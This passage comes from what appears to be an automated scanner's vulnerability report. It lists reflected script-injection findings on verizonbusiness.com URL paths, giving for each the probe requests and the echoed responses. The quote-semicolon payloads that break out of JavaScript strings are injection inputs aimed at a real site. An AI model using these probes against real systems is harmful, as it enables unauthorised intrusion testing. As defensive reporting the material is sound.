Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43672
Date: Wed, 17 Nov 2010 00:47:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/managementeb55b";b85670a5f74/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.183. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21a05"%3b345f00ec30e was submitted in the REST URL parameter 1. This input was echoed as 21a05";345f00ec30e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products21a05"%3b345f00ec30e/mobility/management/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products21a05";345f00ec30e/mobility/management/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.184. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4a94'%3bca42588ec38 was submitted in the REST URL parameter 1. This input was echoed as d4a94';ca42588ec38 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsd4a94'%3bca42588ec38/mobility/management/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Productsd4a94';ca42588ec38/mobility/management/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.185. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf5eb'%3b1c04e180630 was submitted in the REST URL parameter 2. This input was echoed as cf5eb';1c04e180630 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilitycf5eb'%3b1c04e180630/management/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42339
Date: Wed, 17 Nov 2010 00:47:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobilitycf5eb';1c04e180630/management/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.186. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3efa5"%3bd4d61987db9 was submitted in the REST URL parameter 2. This input was echoed as 3efa5";d4d61987db9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility3efa5"%3bd4d61987db9/management/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:46:55 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42337
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility3efa5";d4d61987db9/management/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.187. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 334a6"%3b52979b5fb99 was submitted in the REST URL parameter 3. This input was echoed as 334a6";52979b5fb99 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/management334a6"%3b52979b5fb99/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:23 GMT
Content-Type: text/html
Content-Length: 42514
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/management334a6";52979b5fb99/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.188. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ddb5'%3b3f9e4fe4705 was submitted in the REST URL parameter 3. This input was echoed as 2ddb5';3f9e4fe4705 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/management2ddb5'%3b3f9e4fe4705/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42514
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/management2ddb5';3f9e4fe4705/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.189. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1fb4'%3b77449c5d1be was submitted in the REST URL parameter 4. This input was echoed as a1fb4';77449c5d1be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/management/manageda1fb4'%3b77449c5d1be/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:53 GMT
Content-Type: text/html
Content-Length: 43969
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/management/manageda1fb4';77449c5d1be/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.190. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload daf07"%3baed0622e4f8 was submitted in the REST URL parameter 4. This input was echoed as daf07";aed0622e4f8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/management/manageddaf07"%3baed0622e4f8/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43967
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/management/manageddaf07";aed0622e4f8/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.191. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-email/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8dc5b"%3babb8ad5366a was submitted in the REST URL parameter 1. This input was echoed as 8dc5b";abb8ad5366a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products8dc5b"%3babb8ad5366a/mobility/mobile-email/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Date: Wed, 17 Nov 2010 00:46:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products8dc5b";abb8ad5366a/mobility/mobile-email/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.192. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-email/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83558'%3b7fb3163b374 was submitted in the REST URL parameter 1. This input was echoed as 83558';7fb3163b374 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products83558'%3b7fb3163b374/mobility/mobile-email/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Date: Wed, 17 Nov 2010 00:47:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products83558';7fb3163b374/mobility/mobile-email/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.193. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-email/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38154"%3ba3a0ea05a9f was submitted in the REST URL parameter 2. This input was echoed as 38154";a3a0ea05a9f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility38154"%3ba3a0ea05a9f/mobile-email/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42325
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility38154";a3a0ea05a9f/mobile-email/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.194. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-email/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73370'%3b4d6d8bcdd9d was submitted in the REST URL parameter 2. This input was echoed as 73370';4d6d8bcdd9d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility73370'%3b4d6d8bcdd9d/mobile-email/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42325
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility73370';4d6d8bcdd9d/mobile-email/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.195. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-email/

Issue detail

